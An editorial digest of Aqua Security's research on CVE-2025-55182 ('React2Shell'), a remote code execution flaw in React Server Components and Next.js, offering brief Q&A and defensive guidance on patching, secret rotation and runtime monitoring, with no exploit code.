React2Shell exploitation: are your server-side controls keeping up?

TL;DR: CVE-2025-55182 in React Server Components enables unauthenticated remote code execution in React 19 and Next.js-backed applications, with active exploitation by state-linked groups, botnets, and opportunistic attackers, according to Aqua Security. Server-side framework trust assumptions collapse when deserialisation accepts attacker-controlled input without validation.

NHIMG editorial — based on content published by Aqua Security: Critical CVE in React Server Components Actively Exploited

By the numbers:

• The flaw received a CVSS score of 10.0, reflecting its ease of exploitation, massive ecosystem footprint, and the threat of complete server takeover.

Questions worth separating out

Q: What breaks when a web framework can be exploited for remote code execution?

A: The main break is trust.

Q: Why do server-side rendering frameworks increase the impact of application vulnerabilities?

A: They increase impact because the same runtime often handles rendering, data access, and credential-bearing backend functions.

Q: How do security teams reduce the blast radius of internet-facing RCE flaws?

A: They reduce blast radius by removing long-lived credentials from the runtime, restricting service-account privilege, segmenting workload access, and monitoring for suspicious process and file activity.

Practitioner guidance

• Block vulnerable React and Next.js versions in production Inventory all applications using React 19 and RSC-dependent Next.js releases, then remove affected versions from deployable build paths until patched packages are verified in staging and production.
• Rescan workloads for exposed secrets after any suspected exposure Check environment variables, mounted config, CI/CD variables, and runtime files for credentials that may have been readable during compromise, then revoke and rotate anything that could have left the host boundary.
• Tighten runtime controls around code injection behaviours Use runtime policy to detect unexpected process spawning, shell execution, suspicious file writes, and outbound connections from web workloads so a successful exploit does not become persistent foothold activity.

What's in the full analysis

Aqua Security's full research covers the operational detail this post intentionally leaves for the source:

• Honeypot observations showing how real attackers behaved after exploiting React2Shell in the wild
• Version-specific remediation guidance for React and Next.js releases affected by CVE-2025-55182
• Runtime detection and policy examples for blocking code injection, shell spawning, and suspicious workload behaviour
• Dependency review steps for identifying transitive packages that inherit the vulnerable RSC path

👉 Read Aqua Security's analysis of CVE-2025-55182 and React2Shell exploitation →

React2Shell exploitation: are your server-side controls keeping up?

Explore further

View Full Forum →  |  NHI Foundation Course →